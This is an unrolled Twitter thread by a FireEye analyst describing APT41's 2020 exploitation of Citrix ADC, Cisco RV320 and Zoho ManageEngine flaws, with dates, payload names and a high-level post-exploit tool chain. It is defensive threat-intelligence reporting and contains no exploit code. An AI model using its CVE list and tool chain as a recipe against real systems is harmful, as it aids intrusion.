My Authors
Read all threads
BREAKING: APT41 initiated a multi-month global campaign at over 75 @FireEye customers attempting to exploit Internet facing systems using recently released exploits for Citrix NetScaler/ADC, Cisco Routers & Zoho ManageEngine.

fireeye.com/blog/threat-re…
I've been analyzing @FireEye's telemetry over the last few months for attempts to exploit CVE-2019-19781 (Citrix ADC) and this is the first campaign I was able to find and tie to a specific threat actor.
The CVE-2019-19781 exploitation had three main phases 1) initial reconnaissance on January 20-21 executing the command 'file /bin/pwd' (APT41 was the only actor I could find executing this command)
Then a lull in activity likely related to the Chinese Lunar New Year holidays.

Phase 2) Payload delivery on February 1st that (if successful) used FTP to download a payload named 'bsd' (if anyone has a copy of the sample - sharing is caring)
Then another lull in activity that aligns w/ China initiating broader COVID-19 quarantines. **NOTE: APT41 may have remained active, which we were unable to observe

Phase 3) Payload delivery on Feb 24-25 that downloaded payload named 'un'. This was the largest volume of activity
For those of you playing along at home - you may have seen a thread w/ @markpars0ns @chrisdoman @sysgoblin @bkmsft @colemankane that touched on next two phases of APT41's exploitation attempts (Cisco RV320 routers and Zoho ManageEngine Desktop Central)

APT41 exploited a Cisco RV320 router at a telecommunications organization. About 6% of the targeting in this campaign included telecommunications organizations. Why might APT41 be interested in telcos? 🧐🧐

Remember the MESSAGETAP malware?

fireeye.com/blog/threat-re…
We're not certain what exploit used, but there's a 2019 @metasploit module that enables remote code execution. APT41 deployed payload named 'fuc' (32-bit ELF binary compiled for 64-bit MIPs processor).

I've never seen/analyzed MIPs malware before. I assume payload is custom.
On March 5th, @steventseeley released Proof of Concept code for a Zoho ManageEngine zero-day (CVE-2020-10189). By March 8th - APT41 weaponized the POC and attempted to exploit more than a dozen organizations.

The CVE-2020-10189 exploitation activity is convoluted enough that you should probably just read the blog...but the TLDR is: exploit --> some combo of bitsadmin, powershell, Cobalt Strike backdoor, CertUtil, VMProtected Meterpreter downloader, BEACON shellcode
This isn't the first time we've observed APT41 leverage publicly available exploits to target internet facing systems. We've seen them use both CVE-2019-3396 (Atlassian Confluence) and CVE-2019-11510 (Pulse Secure VPN) as recently as October 2019.
I put my Visio skills to use and created this infographic to help summarize the APT41 exploitation activity, along with some key dates that *may* help explain the absence of activity.
Some unanswered questions I have about the activity:

The ManageEngine exploitation was ~3 days from POC release to weaponization. Why did it take ~10 days to attempt exploitation of Citrix ADC (for recon) and ~20 days to exploit it with an actual payload?
Missing some Tweet in this thread? You can try to force a refresh.

Enjoying this thread?

Keep Current with Christopher Glyer

Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!